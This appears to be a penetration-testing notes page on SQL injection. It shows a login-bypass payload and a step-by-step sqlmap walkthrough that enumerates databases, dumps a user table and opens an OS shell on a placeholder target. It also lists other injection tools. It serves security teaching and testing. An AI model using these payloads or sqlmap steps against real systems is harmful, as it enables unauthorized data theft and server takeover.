SQL Injection

Attack types

SQL injections can be used for various types of attacks:

SQL Injection example

Attackers can craft a query by inputting specific values in application fields, such as usernames and passwords. For example:

• Username: Bob' or 1=1 --

• Password: Whatever

During query execution, these values replace placeholders, resulting in a query like this:

SELECT Count(*) FROM Users WHERE UserName='Bob' or 1=1 --' AND Password='Whatever';

Analyzing this query reveals that the condition in the WHERE clause will always evaluate to true, potentially leading to unauthorized access.

Cheat Sheets

SQL InjectionHackTricks

SQL Injection Cheat Sheet

Tools

sqlmap

"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections."

Target URL and Cookies: First, specify the target URL where the injection will occur. You can also provide the necessary cookies for authentication.

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" --dbs

• -u specifies the target URL.

• --cookie is used to set the HTTP cookie header.

• --dbs instructs sqlmap to enumerate the available databases in the DBMS.

Select a Database: After identifying the databases, you can select a specific one for further exploration. In this example, we'll use a database named "exampledb."

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" -D exampledb --tables

• -D specifies the database to enumerate.

• --tables instructs sqlmap to list the tables in the chosen database.

Retrieve Table Content: Now, let's say we want to retrieve the content of a table called "user_data." You can use sqlmap to dump the table content.

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" -D exampledb -T user_data --dump

• -T specifies the table to extract data from.

• --dump is used to retrieve and display the table content.

Interactive OS Shell: sqlmap can also provide an interactive OS shell for advanced operations.

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" --os-shell

• --os-shell initiates an interactive OS shell.

• Optimize Delay Responses: If prompted with a message asking if you want sqlmap to optimize delay responses, you can respond with "Y" to improve the injection efficiency.

• View Available Commands: To explore the available commands within the interactive OS shell, simply type "help."

Mole

Mole is a graphical, cross-platform SQL injection testing tool. It provides a user-friendly interface for analyzing and manipulating SQL injection attacks, making it easier for testers to perform various SQL injection techniques and assess the security of a web application.

Blisqy

Blisqy is a lightweight and open-source SQL Injection tool that is designed to automate the process of discovering and exploiting SQL injection vulnerabilities in web applications. It's a command-line tool that provides a simple and efficient way to identify and exploit SQL injection flaws.

For mobile devices

sqlmapchik

"sqlmapchik is a cross-platform sqlmap GUI for popular sqlmap tool. It is primarily aimed to be used on mobile devices (currently Android is supported)."